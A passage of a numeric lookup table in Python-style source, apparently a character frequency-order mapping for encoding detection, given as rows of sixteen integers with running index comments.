8368,8369,8370,4870,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382, # 8112
8383,8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398, # 8128
8399,8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,4871,8411,8412,8413, # 8144
8414,8415,8416,8417,8418,8419,8420,8421,8422,4462,8423,8424,8425,8426,8427,8428, # 8160
8429,8430,8431,8432,8433,2986,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443, # 8176
8444,8445,8446,8447,8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459, # 8192
8460,8461,8462,8463,8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475, # 8208
8476,8477,8478,4180,8479,8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490, # 8224
8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506, # 8240
8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522, # 8256
8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538, # 8272
8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554, # 8288
8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,4872,8565,8566,8567,8568,8569, # 8304
8570,8571,8572,8573,4873,8574,8575,8576,8577,8578,8579,8580,8581,8582,8583,8584, # 8320
8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597,8598,8599,8600, # 8336
8601,8602,8603,8604,8605,3803,8606,8607,8608,8609,8610,8611,8612,8613,4874,3804, # 8352
8614,8615,8616,8617,8618,8619,8620,8621,3956,8622,8623,8624,8625,8626,8627,8628, # 8368
8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,2865,8639,8640,8641,8642,8643, # 8384
8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,4463,8657,8658, # 8400
8659,4875,4876,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672, # 8416
8673,8674,8675,8676,8677,8678,8679,8680,8681,4464,8682,8683,8684,8685,8686,8687, # 8432
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703, # 8448
8704,8705,8706,8707,8708,8709,2261,8710,8711,8712,8713,8714,8715,8716,8717,8718, # 8464
8719,8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,4181, # 8480
8734,8735,8736,8737,8738,8739,8740,8741,8742,8743,8744,8745,8746,8747,8748,8749, # 8496
8750,8751,8752,8753,8754,8755,8756,8757,8758,8759,8760,8761,8762,8763,4877,8764, # 8512
8765,8766,8767,8768,8769,8770,8771,8772,8773,8774,8775,8776,8777,8778,8779,8780, # 8528
8781,8782,8783,8784,8785,8786,8787,8788,4878,8789,4879,8790,8791,8792,4880,8793, # 8544
8794,8795,8796,8797,8798,8799,8800,8801,4881,8802,8803,8804,8805,8806,8807,8808, # 8560
8809,8810,8811,8812,8813,8814,8815,3957,8816,8817,8818,8819,8820,8821,8822,8823, # 8576
8824,8825,8826,8827,8828,8829,8830,8831,8832,8833,8834,8835,8836,8837,8838,8839, # 8592
8840,8841,8842,8843,8844,8845,8846,8847,4882,8848,8849,8850,8851,8852,8853,8854, # 8608
8855,8856,8857,8858,8859,8860,8861,8862,8863,8864,8865,8866,8867,8868,8869,8870, # 8624
8871,8872,8873,8874,8875,8876,8877,8878,8879,8880,8881,8882,8883,8884,3202,8885, # 8640
8886,8887,8888,8889,8890,8891,8892,8893,8894,8895,8896,8897,8898,8899,8900,8901, # 8656
8902,8903,8904,8905,8906,8907,8908,8909,8910,8911,8912,8913,8914,8915,8916,8917, # 8672
8918,8919,8920,8921,8922,8923,8924,4465,8925,8926,8927,8928,8929,8930,8931,8932, # 8688
4883,8933,8934,8935,8936,8937,8938,8939,8940,8941,8942,8943,2214,8944,8945,8946, # 8704
8947,8948,8949,8950,8951,8952,8953,8954,8955,8956,8957,8958,8959,8960,8961,8962, # 8720
8963,8964,8965,4884,8966,8967,8968,8969,8970,8971,8972,8973,8974,8975,8976,8977, # 8736
8978,8979,8980,8981,8982,8983,8984,8985,8986,8987,8988,8989,8990,8991,8992,4885, # 8752
8993,8994,8995,8996,8997,8998,8999,9000,9001,9002,9003,9004,9005,9006,9007,9008, # 8768
9009,9010,9011,9012,9013,9014,9015,9016,9017,9018,9019,9020,9021,4182,9022,9023, # 8784
9024,9025,9026,9027,9028,9029,9030,9031,9032,9033,9034,9035,9036,9037,9038,9039, # 8800
9040,9041,9042,9043,9044,9045,9046,9047,9048,9049,9050,9051,9052,9053,9054,9055, # 8816
9056,9057,9058,9059,9060,9061,9062,9063,4886,9064,9065,9066,9067,9068,9069,4887, # 8832
9070,9071,9072,9073,9074,9075,9076,9077,9078,9079,9080,9081,9082,9083,9084,9085, # 8848
9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9101, # 8864
9102,9103,9104,9105,9106,9107,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117, # 8880
9118,9119,9120,9121,9122,9123,9124,9125,9126,9127,9128,9129,9130,9131,9132,9133, # 8896
9134,9135,9136,9137,9138,9139,9140,9141,3958,9142,9143,9144,9145,9146,9147,9148, # 8912
9149,9150,9151,4888,9152,9153,9154,9155,9156,9157,9158,9159,9160,9161,9162,9163, # 8928
9164,9165,9166,9167,9168,9169,9170,9171,9172,9173,9174,9175,4889,9176,9177,9178, # 8944
9179,9180,9181,9182,9183,9184,9185,9186,9187,9188,9189,9190,9191,9192,9193,9194, # 8960
9195,9196,9197,9198,9199,9200,9201,9202,9203,4890,9204,9205,9206,9207,9208,9209, # 8976
9210,9211,9212,9213,9214,9215,9216,9217,9218,9219,9220,9221,9222,4466,9223,9224, # 8992
9225,9226,9227,9228,9229,9230,9231,9232,9233,9234,9235,9236,9237,9238,9239,9240, # 9008
9241,9242,9243,9244,9245,4891,9246,9247,9248,9249,9250,9251,9252,9253,9254,9255, # 9024
9256,9257,4892,9258,9259,9260,9261,4893,4894,9262,9263,9264,9265,9266,9267,9268, # 9040
9269,9270,9271,9272,9273,4467,9274,9275,9276,9277,9278,9279,9280,9281,9282,9283, # 9056
9284,9285,3673,9286,9287,9288,9289,9290,9291,9292,9293,9294,9295,9296,9297,9298, # 9072
9299,9300,9301,9302,9303,9304,9305,9306,9307,9308,9309,9310,9311,9312,9313,9314, # 9088
9315,9316,9317,9318,9319,9320,9321,9322,4895,9323,9324,9325,9326,9327,9328,9329, # 9104
9330,9331,9332,9333,9334,9335,9336,9337,9338,9339,9340,9341,9342,9343,9344,9345, # 9120
9346,9347,4468,9348,9349,9350,9351,9352,9353,9354,9355,9356,9357,9358,9359,9360, # 9136
9361,9362,9363,9364,9365,9366,9367,9368,9369,9370,9371,9372,9373,4896,9374,4469, # 9152
9375,9376,9377,9378,9379,4897,9380,9381,9382,9383,9384,9385,9386,9387,9388,9389, # 9168
9390,9391,9392,9393,9394,9395,9396,9397,9398,9399,9400,9401,9402,9403,9404,9405, # 9184
9406,4470,9407,2751,9408,9409,3674,3552,9410,9411,9412,9413,9414,9415,9416,9417, # 9200
9418,9419,9420,9421,4898,9422,9423,9424,9425,9426,9427,9428,9429,3959,9430,9431, # 9216
9432,9433,9434,9435,9436,4471,9437,9438,9439,9440,9441,9442,9443,9444,9445,9446, # 9232
9447,9448,9449,9450,3348,9451,9452,9453,9454,9455,9456,9457,9458,9459,9460,9461, # 9248
9462,9463,9464,9465,9466,9467,9468,9469,9470,9471,9472,4899,9473,9474,9475,9476, # 9264
9477,4900,9478,9479,9480,9481,9482,9483,9484,9485,9486,9487,9488,3349,9489,9490, # 9280
9491,9492,9493,9494,9495,9496,9497,9498,9499,9500,9501,9502,9503,9504,9505,9506, # 9296
9507,9508,9509,9510,9511,9512,9513,9514,9515,9516,9517,9518,9519,9520,4901,9521, # 9312
9522,9523,9524,9525,9526,4902,9527,9528,9529,9530,9531,9532,9533,9534,9535,9536, # 9328
9537,9538,9539,9540,9541,9542,9543,9544,9545,9546,9547,9548,9549,9550,9551,9552, # 9344
9553,9554,9555,9556,9557,9558,9559,9560,9561,9562,9563,9564,9565,9566,9567,9568, # 9360
9569,9570,9571,9572,9573,9574,9575,9576,9577,9578,9579,9580,9581,9582,9583,9584, # 9376
3805,9585,9586,9587,9588,9589,9590,9591,9592,9593,9594,9595,9596,9597,9598,9599, # 9392
9600,9601,9602,4903,9603,9604,9605,9606,9607,4904,9608,9609,9610,9611,9612,9613, # 9408
9614,4905,9615,9616,9617,9618,9619,9620,9621,9622,9623,9624,9625,9626,9627,9628, # 9424
9629,9630,9631,9632,4906,9633,9634,9635,9636,9637,9638,9639,9640,9641,9642,9643, # 9440
4907,9644,9645,9646,9647,9648,9649,9650,9651,9652,9653,9654,9655,9656,9657,9658, # 9456
9659,9660,9661,9662,9663,9664,9665,9666,9667,9668,9669,9670,9671,9672,4183,9673, # 9472
9674,9675,9676,9677,4908,9678,9679,9680,9681,4909,9682,9683,9684,9685,9686,9687, # 9488
9688,9689,9690,4910,9691,9692,9693,3675,9694,9695,9696,2945,9697,9698,9699,9700, # 9504
9701,9702,9703,9704,9705,4911,9706,9707,9708,9709,9710,9711,9712,9713,9714,9715, # 9520
9716,9717,9718,9719,9720,9721,9722,9723,9724,9725,9726,9727,9728,9729,9730,9731, # 9536
9732,9733,9734,9735,4912,9736,9737,9738,9739,9740,4913,9741,9742,9743,9744,9745, # 9552
9746,9747,9748,9749,9750,9751,9752,9753,9754,9755,9756,9757,9758,4914,9759,9760, # 9568
9761,9762,9763,9764,9765,9766,9767,9768,9769,9770,9771,9772,9773,9774,9775,9776, # 9584
9777,9778,9779,9780,9781,9782,4915,9783,9784,9785,9786,9787,9788,9789,9790,9791, # 9600
9792,9793,4916,9794,9795,9796,9797,9798,9799,9800,9801,9802,9803,9804,9805,9806, # 9616
9807,9808,9809,9810,9811,9812,9813,9814,9815,9816,9817,9818,9819,9820,9821,9822, # 9632
9823,9824,9825,9826,9827,9828,9829,9830,9831,9832,9833,9834,9835,9836,9837,9838, # 9648
9839,9840,9841,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852,9853,9854, # 9664
9855,9856,9857,9858,9859,9860,9861,9862,9863,9864,9865,9866,9867,9868,4917,9869, # 9680
9870,9871,9872,9873,9874,9875,9876,9877,9878,9879,9880,9881,9882,9883,9884,9885, # 9696
9886,9887,9888,9889,9890,9891,9892,4472,9893,9894,9895,9896,9897,3806,9898,9899, # 9712
9900,9901,9902,9903,9904,9905,9906,9907,9908,9909,9910,9911,9912,9913,9914,4918, # 9728
9915,9916,9917,4919,9918,9919,9920,9921,4184,9922,9923,9924,9925,9926,9927,9928, # 9744
9929,9930,9931,9932,9933,9934,9935,9936,9937,9938,9939,9940,9941,9942,9943,9944, # 9760
9945,9946,4920,9947,9948,9949,9950,9951,9952,9953,9954,9955,4185,9956,9957,9958, # 9776
9959,9960,9961,9962,9963,9964,9965,4921,9966,9967,9968,4473,9969,9970,9971,9972, # 9792
9973,9974,9975,9976,9977,4474,9978,9979,9980,9981,9982,9983,9984,9985,9986,9987, # 9808
9988,9989,9990,9991,9992,9993,9994,9995,9996,9997,9998,9999,10000,10001,10002,10003, # 9824
10004,10005,10006,10007,10008,10009,10010,10011,10012,10013,10014,10015,10016,10017,10018,10019, # 9840
10020,10021,4922,10022,4923,10023,10024,10025,10026,10027,10028,10029,10030,10031,10032,10033, # 9856
10034,10035,10036,10037,10038,10039,10040,10041,10042,10043,10044,10045,10046,10047,10048,4924, # 9872
10049,10050,10051,10052,10053,10054,10055,10056,10057,10058,10059,10060,10061,10062,10063,10064, # 9888
10065,10066,10067,10068,10069,10070,10071,10072,10073,10074,10075,10076,10077,10078,10079,10080, # 9904
10081,10082,10083,10084,10085,10086,10087,4475,10088,10089,10090,10091,10092,10093,10094,10095, # 9920
10096,10097,4476,10098,10099,10100,10101,10102,10103,10104,10105,10106,10107,10108,10109,10110, # 9936
10111,2174,10112,10113,10114,10115,10116,10117,10118,10119,10120,10121,10122,10123,10124,10125, # 9952
10126,10127,10128,10129,10130,10131,10132,10133,10134,10135,10136,10137,10138,10139,10140,3807, # 9968
4186,4925,10141,10142,10143,10144,10145,10146,10147,4477,4187,10148,10149,10150,10151,10152, # 9984
10153,4188,10154,10155,10156,10157,10158,10159,10160,10161,4926,10162,10163,10164,10165,10166, #10000
10167,10168,10169,10170,10171,10172,10173,10174,10175,10176,10177,10178,10179,10180,10181,10182, #10016
10183,10184,10185,10186,10187,10188,10189,10190,10191,10192,3203,10193,10194,10195,10196,10197, #10032
10198,10199,10200,4478,10201,10202,10203,10204,4479,10205,10206,10207,10208,10209,10210,10211, #10048
10212,10213,10214,10215,10216,10217,10218,10219,10220,10221,10222,10223,10224,10225,10226,10227, #10064
10228,10229,10230,10231,10232,10233,10234,4927,10235,10236,10237,10238,10239,10240,10241,10242, #10080
10243,10244,10245,10246,10247,10248,10249,10250,10251,10252,10253,10254,10255,10256,10257,10258, #10096
10259,10260,10261,10262,10263,10264,10265,10266,10267,10268,10269,10270,10271,10272,10273,4480, #10112
4928,4929,10274,10275,10276,10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287, #10128
10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298,10299,10300,10301,10302,10303, #10144
10304,10305,10306,10307,10308,10309,10310,10311,10312,10313,10314,10315,10316,10317,10318,10319, #10160
10320,10321,10322,10323,10324,10325,10326,10327,10328,10329,10330,10331,10332,10333,10334,4930, #10176
10335,10336,10337,10338,10339,10340,10341,10342,4931,10343,10344,10345,10346,10347,10348,10349, #10192
10350,10351,10352,10353,10354,10355,3088,10356,2786,10357,10358,10359,10360,4189,10361,10362, #10208
10363,10364,10365,10366,10367,10368,10369,10370,10371,10372,10373,10374,10375,4932,10376,10377, #10224
10378,10379,10380,10381,10382,10383,10384,10385,10386,10387,10388,10389,10390,10391,10392,4933, #10240
10393,10394,10395,4934,10396,10397,10398,10399,10400,10401,10402,10403,10404,10405,10406,10407, #10256
10408,10409,10410,10411,10412,3446,10413,10414,10415,10416,10417,10418,10419,10420,10421,10422, #10272
10423,4935,10424,10425,10426,10427,10428,10429,10430,4936,10431,10432,10433,10434,10435,10436, #10288
10437,10438,10439,10440,10441,10442,10443,4937,10444,10445,10446,10447,4481,10448,10449,10450, #10304
10451,10452,10453,10454,10455,10456,10457,10458,10459,10460,10461,10462,10463,10464,10465,10466, #10320
10467,10468,10469,10470,10471,10472,10473,10474,10475,10476,10477,10478,10479,10480,10481,10482, #10336
10483,10484,10485,10486,10487,10488,10489,10490,10491,10492,10493,10494,10495,10496,10497,10498, #10352
10499,10500,10501,10502,10503,10504,10505,4938,10506,10507,10508,10509,10510,2552,10511,10512, #10368
10513,10514,10515,10516,3447,10517,10518,10519,10520,10521,10522,10523,10524,10525,10526,10527, #10384
10528,10529,10530,10531,10532,10533,10534,10535,10536,10537,10538,10539,10540,10541,10542,10543, #10400
4482,10544,4939,10545,10546,10547,10548,10549,10550,10551,10552,10553,10554,10555,10556,10557, #10416
10558,10559,10560,10561,10562,10563,10564,10565,10566,10567,3676,4483,10568,10569,10570,10571, #10432
10572,3448,10573,10574,10575,10576,10577,10578,10579,10580,10581,10582,10583,10584,10585,10586, #10448
10587,10588,10589,10590,10591,10592,10593,10594,10595,10596,10597,10598,10599,10600,10601,10602, #10464
10603,10604,10605,10606,10607,10608,10609,10610,10611,10612,10613,10614,10615,10616,10617,10618, #10480
10619,10620,10621,10622,10623,10624,10625,10626,10627,4484,10628,10629,10630,10631,10632,4940, #10496
10633,10634,10635,10636,10637,10638,10639,10640,10641,10642,10643,10644,10645,10646,10647,10648, #10512
10649,10650,10651,10652,10653,10654,10655,10656,4941,10657,10658,10659,2599,10660,10661,10662, #10528
10663,10664,10665,10666,3089,10667,10668,10669,10670,10671,10672,10673,10674,10675,10676,10677, #10544
10678,10679,10680,4942,10681,10682,10683,10684,10685,10686,10687,10688,10689,10690,10691,10692, #10560
10693,10694,10695,10696,10697,4485,10698,10699,10700,10701,10702,10703,10704,4943,10705,3677, #10576
10706,10707,10708,10709,10710,10711,10712,4944,10713,10714,10715,10716,10717,10718,10719,10720, #10592
10721,10722,10723,10724,10725,10726,10727,10728,4945,10729,10730,10731,10732,10733,10734,10735, #10608
10736,10737,10738,10739,10740,10741,10742,10743,10744,10745,10746,10747,10748,10749,10750,10751, #10624
10752,10753,10754,10755,10756,10757,10758,10759,10760,10761,4946,10762,10763,10764,10765,10766, #10640
10767,4947,4948,10768,10769,10770,10771,10772,10773,10774,10775,10776,10777,10778,10779,10780, #10656
10781,10782,10783,10784,10785,10786,10787,10788,10789,10790,10791,10792,10793,10794,10795,10796, #10672
10797,10798,10799,10800,10801,10802,10803,10804,10805,10806,10807,10808,10809,10810,10811,10812, #10688
10813,10814,10815,10816,10817,10818,10819,10820,10821,10822,10823,10824,10825,10826,10827,10828, #10704
10829,10830,10831,10832,10833,10834,10835,10836,10837,10838,10839,10840,10841,10842,10843,10844, #10720
10845,10846,10847,10848,10849,10850,10851,10852,10853,10854,10855,10856,10857,10858,10859,10860, #10736
10861,10862,10863,10864,10865,10866,10867,10868,10869,10870,10871,10872,10873,10874,10875,10876, #10752
10877,10878,4486,10879,10880,10881,10882,10883,10884,10885,4949,10886,10887,10888,10889,10890, #10768
10891,10892,10893,10894,10895,10896,10897,10898,10899,10900,10901,10902,10903,10904,10905,10906, #10784
10907,10908,10909,10910,10911,10912,10913,10914,10915,10916,10917,10918,10919,4487,10920,10921, #10800
10922,10923,10924,10925,10926,10927,10928,10929,10930,10931,10932,4950,10933,10934,10935,10936, #10816
10937,10938,10939,10940,10941,10942,10943,10944,10945,10946,10947,10948,10949,4488,10950,10951, #10832
10952,10953,10954,10955,10956,10957,10958,10959,4190,10960,10961,10962,10963,10964,10965,10966, #10848
10967,10968,10969,10970,10971,10972,10973,10974,10975,10976,10977,10978,10979,10980,10981,10982, #10864
10983,10984,10985,10986,10987,10988,10989,10990,10991,10992,10993,10994,10995,10996,10997,10998, #10880
10999,11000,11001,11002,11003,11004,11005,11006,3960,11007,11008,11009,11010,11011,11012,11013, #10896
11014,11015,11016,11017,11018,11019,11020,11021,11022,11023,11024,11025,11026,11027,11028,11029, #10912
11030,11031,11032,4951,11033,11034,11035,11036,11037,11038,11039,11040,11041,11042,11043,11044, #10928
11045,11046,11047,4489,11048,11049,11050,11051,4952,11052,11053,11054,11055,11056,11057,11058, #10944
4953,11059,11060,11061,11062,11063,11064,11065,11066,11067,11068,11069,11070,11071,4954,11072, #10960
11073,11074,11075,11076,11077,11078,11079,11080,11081,11082,11083,11084,11085,11086,11087,11088, #10976
11089,11090,11091,11092,11093,11094,11095,11096,11097,11098,11099,11100,11101,11102,11103,11104, #10992
11105,11106,11107,11108,11109,11110,11111,11112,11113,11114,11115,3808,11116,11117,11118,11119, #11008
11120,11121,11122,11123,11124,11125,11126,11127,11128,11129,11130,11131,11132,11133,11134,4955, #11024
11135,11136,11137,11138,11139,11140,11141,11142,11143,11144,11145,11146,11147,11148,11149,11150, #11040
11151,11152,11153,11154,11155,11156,11157,11158,11159,11160,11161,4956,11162,11163,11164,11165, #11056
11166,11167,11168,11169,11170,11171,11172,11173,11174,11175,11176,11177,11178,11179,11180,4957, #11072
11181,11182,11183,11184,11185,11186,4958,11187,11188,11189,11190,11191,11192,11193,11194,11195, #11088
11196,11197,11198,11199,11200,3678,11201,11202,11203,11204,11205,11206,4191,11207,11208,11209, #11104
11210,11211,11212,11213,11214,11215,11216,11217,11218,11219,11220,11221,11222,11223,11224,11225, #11120
11226,11227,11228,11229,11230,11231,11232,11233,11234,11235,11236,11237,11238,11239,11240,11241, #11136
11242,11243,11244,11245,11246,11247,11248,11249,11250,11251,4959,11252,11253,11254,11255,11256, #11152
11257,11258,11259,11260,11261,11262,11263,11264,11265,11266,11267,11268,11269,11270,11271,11272, #11168
11273,11274,11275,11276,11277,11278,11279,11280,11281,11282,11283,11284,11285,11286,11287,11288, #11184
11289,11290,11291,11292,11293,11294,11295,11296,11297,11298,11299,11300,11301,11302,11303,11304, #11200
11305,11306,11307,11308,11309,11310,11311,11312,11313,11314,3679,11315,11316,11317,11318,4490, #11216
11319,11320,11321,11322,11323,11324,11325,11326,11327,11328,11329,11330,11331,11332,11333,11334, #11232
11335,11336,11337,11338,11339,11340,11341,11342,11343,11344,11345,11346,11347,4960,11348,11349, #11248
11350,11351,11352,11353,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365, #11264
11366,11367,11368,11369,11370,11371,11372,11373,11374,11375,11376,11377,3961,4961,11378,11379, #11280
11380,11381,11382,11383,11384,11385,11386,11387,11388,11389,11390,11391,11392,11393,11394,11395, #11296
11396,11397,4192,11398,11399,11400,11401,11402,11403,11404,11405,11406,11407,11408,11409,11410, #11312
11411,4962,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11424,11425, #11328
11426,11427,11428,11429,11430,11431,11432,11433,11434,11435,11436,11437,11438,11439,11440,11441, #11344
11442,11443,11444,11445,11446,11447,11448,11449,11450,11451,11452,11453,11454,11455,11456,11457, #11360
11458,11459,11460,11461,11462,11463,11464,11465,11466,11467,11468,11469,4963,11470,11471,4491, #11376
11472,11473,11474,11475,4964,11476,11477,11478,11479,11480,11481,11482,11483,11484,11485,11486, #11392
11487,11488,11489,11490,11491,11492,4965,11493,11494,11495,11496,11497,11498,11499,11500,11501, #11408
11502,11503,11504,11505,11506,11507,11508,11509,11510,11511,11512,11513,11514,11515,11516,11517, #11424
11518,11519,11520,11521,11522,11523,11524,11525,11526,11527,11528,11529,3962,11530,11531,11532, #11440
11533,11534,11535,11536,11537,11538,11539,11540,11541,11542,11543,11544,11545,11546,11547,11548, #11456
11549,11550,11551,11552,11553,11554,11555,11556,11557,11558,11559,11560,11561,11562,11563,11564, #11472
4193,4194,11565,11566,11567,11568,11569,11570,11571,11572,11573,11574,11575,11576,11577,11578, #11488
11579,11580,11581,11582,11583,11584,11585,11586,11587,11588,11589,11590,11591,4966,4195,11592, #11504
11593,11594,11595,11596,11597,11598,11599,11600,11601,11602,11603,11604,3090,11605,11606,11607, #11520
11608,11609,11610,4967,11611,11612,11613,11614,11615,11616,11617,11618,11619,11620,11621,11622, #11536
11623,11624,11625,11626,11627,11628,11629,11630,11631,11632,11633,11634,11635,11636,11637,11638, #11552
11639,11640,11641,11642,11643,11644,11645,11646,11647,11648,11649,11650,11651,11652,11653,11654, #11568
11655,11656,11657,11658,11659,11660,11661,11662,11663,11664,11665,11666,11667,11668,11669,11670, #11584
11671,11672,11673,11674,4968,11675,11676,11677,11678,11679,11680,11681,11682,11683,11684,11685, #11600
11686,11687,11688,11689,11690,11691,11692,11693,3809,11694,11695,11696,11697,11698,11699,11700, #11616
11701,11702,11703,11704,11705,11706,11707,11708,11709,11710,11711,11712,11713,11714,11715,11716, #11632
11717,11718,3553,11719,11720,11721,11722,11723,11724,11725,11726,11727,11728,11729,11730,4969, #11648
11731,11732,11733,11734,11735,11736,11737,11738,11739,11740,4492,11741,11742,11743,11744,11745, #11664
11746,11747,11748,11749,11750,11751,11752,4970,11753,11754,11755,11756,11757,11758,11759,11760, #11680
11761,11762,11763,11764,11765,11766,11767,11768,11769,11770,11771,11772,11773,11774,11775,11776, #11696
11777,11778,11779,11780,11781,11782,11783,11784,11785,11786,11787,11788,11789,11790,4971,11791, #11712
11792,11793,11794,11795,11796,11797,4972,11798,11799,11800,11801,11802,11803,11804,11805,11806, #11728
11807,11808,11809,11810,4973,11811,11812,11813,11814,11815,11816,11817,11818,11819,11820,11821, #11744
11822,11823,11824,11825,11826,11827,11828,11829,11830,11831,11832,11833,11834,3680,3810,11835, #11760
11836,4974,11837,11838,11839,11840,11841,11842,11843,11844,11845,11846,11847,11848,11849,11850, #11776
11851,11852,11853,11854,11855,11856,11857,11858,11859,11860,11861,11862,11863,11864,11865,11866, #11792
11867,11868,11869,11870,11871,11872,11873,11874,11875,11876,11877,11878,11879,11880,11881,11882, #11808
11883,11884,4493,11885,11886,11887,11888,11889,11890,11891,11892,11893,11894,11895,11896,11897, #11824
11898,11899,11900,11901,11902,11903,11904,11905,11906,11907,11908,11909,11910,11911,11912,11913, #11840
11914,11915,4975,11916,11917,11918,11919,11920,11921,11922,11923,11924,11925,11926,11927,11928, #11856
11929,11930,11931,11932,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11943,11944, #11872
11945,11946,11947,11948,11949,4976,11950,11951,11952,11953,11954,11955,11956,11957,11958,11959, #11888
11960,11961,11962,11963,11964,11965,11966,11967,11968,11969,11970,11971,11972,11973,11974,11975, #11904
11976,11977,11978,11979,11980,11981,11982,11983,11984,11985,11986,11987,4196,11988,11989,11990, #11920
11991,11992,4977,11993,11994,11995,11996,11997,11998,11999,12000,12001,12002,12003,12004,12005, #11936
12006,12007,12008,12009,12010,12011,12012,12013,12014,12015,12016,12017,12018,12019,12020,12021, #11952
12022,12023,12024,12025,12026,12027,12028,12029,12030,12031,12032,12033,12034,12035,12036,12037, #11968
12038,12039,12040,12041,12042,12043,12044,12045,12046,12047,12048,12049,12050,12051,12052,12053, #11984
12054,12055,12056,12057,12058,12059,12060,12061,4978,12062,12063,12064,12065,12066,12067,12068, #12000
12069,12070,12071,12072,12073,12074,12075,12076,12077,12078,12079,12080,12081,12082,12083,12084, #12016
12085,12086,12087,12088,12089,12090,12091,12092,12093,12094,12095,12096,12097,12098,12099,12100, #12032
12101,12102,12103,12104,12105,12106,12107,12108,12109,12110,12111,12112,12113,12114,12115,12116, #12048
12117,12118,12119,12120,12121,12122,12123,4979,12124,12125,12126,12127,12128,4197,12129,12130, #12064
12131,12132,12133,12134,12135,12136,12137,12138,12139,12140,12141,12142,12143,12144,12145,12146, #12080
12147,12148,12149,12150,12151,12152,12153,12154,4980,12155,12156,12157,12158,12159,12160,4494, #12096
12161,12162,12163,12164,3811,12165,12166,12167,12168,12169,4495,12170,12171,4496,12172,12173, #12112
12174,12175,12176,3812,12177,12178,12179,12180,12181,12182,12183,12184,12185,12186,12187,12188, #12128
12189,12190,12191,12192,12193,12194,12195,12196,12197,12198,12199,12200,12201,12202,12203,12204, #12144
12205,12206,12207,12208,12209,12210,12211,12212,12213,12214,12215,12216,12217,12218,12219,12220, #12160
12221,4981,12222,12223,12224,12225,12226,12227,12228,12229,12230,12231,12232,12233,12234,12235, #12176
4982,12236,12237,12238,12239,12240,12241,12242,12243,12244,12245,4983,12246,12247,12248,12249, #12192
4984,12250,12251,12252,12253,12254,12255,12256,12257,12258,12259,12260,12261,12262,12263,12264, #12208
4985,12265,4497,12266,12267,12268,12269,12270,12271,12272,12273,12274,12275,12276,12277,12278, #12224
12279,12280,12281,12282,12283,12284,12285,12286,12287,4986,12288,12289,12290,12291,12292,12293, #12240
12294,12295,12296,2473,12297,12298,12299,12300,12301,12302,12303,12304,12305,12306,12307,12308, #12256
12309,12310,12311,12312,12313,12314,12315,12316,12317,12318,12319,3963,12320,12321,12322,12323, #12272
12324,12325,12326,12327,12328,12329,12330,12331,12332,4987,12333,12334,12335,12336,12337,12338, #12288
12339,12340,12341,12342,12343,12344,12345,12346,12347,12348,12349,12350,12351,12352,12353,12354, #12304
12355,12356,12357,12358,12359,3964,12360,12361,12362,12363,12364,12365,12366,12367,12368,12369, #12320
12370,3965,12371,12372,12373,12374,12375,12376,12377,12378,12379,12380,12381,12382,12383,12384, #12336
12385,12386,12387,12388,12389,12390,12391,12392,12393,12394,12395,12396,12397,12398,12399,12400, #12352
12401,12402,12403,12404,12405,12406,12407,12408,4988,12409,12410,12411,12412,12413,12414,12415, #12368
12416,12417,12418,12419,12420,12421,12422,12423,12424,12425,12426,12427,12428,12429,12430,12431, #12384
12432,12433,12434,12435,12436,12437,12438,3554,12439,12440,12441,12442,12443,12444,12445,12446, #12400
12447,12448,12449,12450,12451,12452,12453,12454,12455,12456,12457,12458,12459,12460,12461,12462, #12416
12463,12464,4989,12465,12466,12467,12468,12469,12470,12471,12472,12473,12474,12475,12476,12477, #12432
12478,12479,12480,4990,12481,12482,12483,12484,12485,12486,12487,12488,12489,4498,12490,12491, #12448
12492,12493,12494,12495,12496,12497,12498,12499,12500,12501,12502,12503,12504,12505,12506,12507, #12464
12508,12509,12510,12511,12512,12513,12514,12515,12516,12517,12518,12519,12520,12521,12522,12523, #12480
12524,12525,12526,12527,12528,12529,12530,12531,12532,12533,12534,12535,12536,12537,12538,12539, #12496
12540,12541,12542,12543,12544,12545,12546,12547,12548,12549,12550,12551,4991,12552,12553,12554, #12512
12555,12556,12557,12558,12559,12560,12561,12562,12563,12564,12565,12566,12567,12568,12569,12570, #12528
12571,12572,12573,12574,12575,12576,12577,12578,3036,12579,12580,12581,12582,12583,3966,12584, #12544
12585,12586,12587,12588,12589,12590,12591,12592,12593,12594,12595,12596,12597,12598,12599,12600, #12560
12601,12602,12603,12604,12605,12606,12607,12608,12609,12610,12611,12612,12613,12614,12615,12616, #12576
12617,12618,12619,12620,12621,12622,12623,12624,12625,12626,12627,12628,12629,12630,12631,12632, #12592
12633,12634,12635,12636,12637,12638,12639,12640,12641,12642,12643,12644,12645,12646,4499,12647, #12608
12648,12649,12650,12651,12652,12653,12654,12655,12656,12657,12658,12659,12660,12661,12662,12663, #12624
12664,12665,12666,12667,12668,12669,12670,12671,12672,12673,12674,12675,12676,12677,12678,12679, #12640
12680,12681,12682,12683,12684,12685,12686,12687,12688,12689,12690,12691,12692,12693,12694,12695, #12656
12696,12697,12698,4992,12699,12700,12701,12702,12703,12704,12705,12706,12707,12708,12709,12710, #12672
